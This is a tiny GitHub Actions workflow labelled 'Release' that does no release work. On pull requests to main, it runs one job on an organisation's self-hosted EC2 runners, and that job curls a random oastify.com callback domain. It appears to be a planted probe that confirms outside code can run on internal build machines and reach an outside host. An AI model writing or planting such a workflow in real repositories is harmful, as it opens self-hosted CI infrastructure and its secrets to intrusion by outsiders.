name: "Release"
on:
  workflow_dispatch: { }
  pull_request:
    branches: [main]

jobs:
  testtest:
    name: Ding Ding

    runs-on: [ coveo, linux, x64, ec2 ]

    steps:
      - run: curl 9t3ybxo8fbhc7iycue352cye157xvnjc.oastify.com
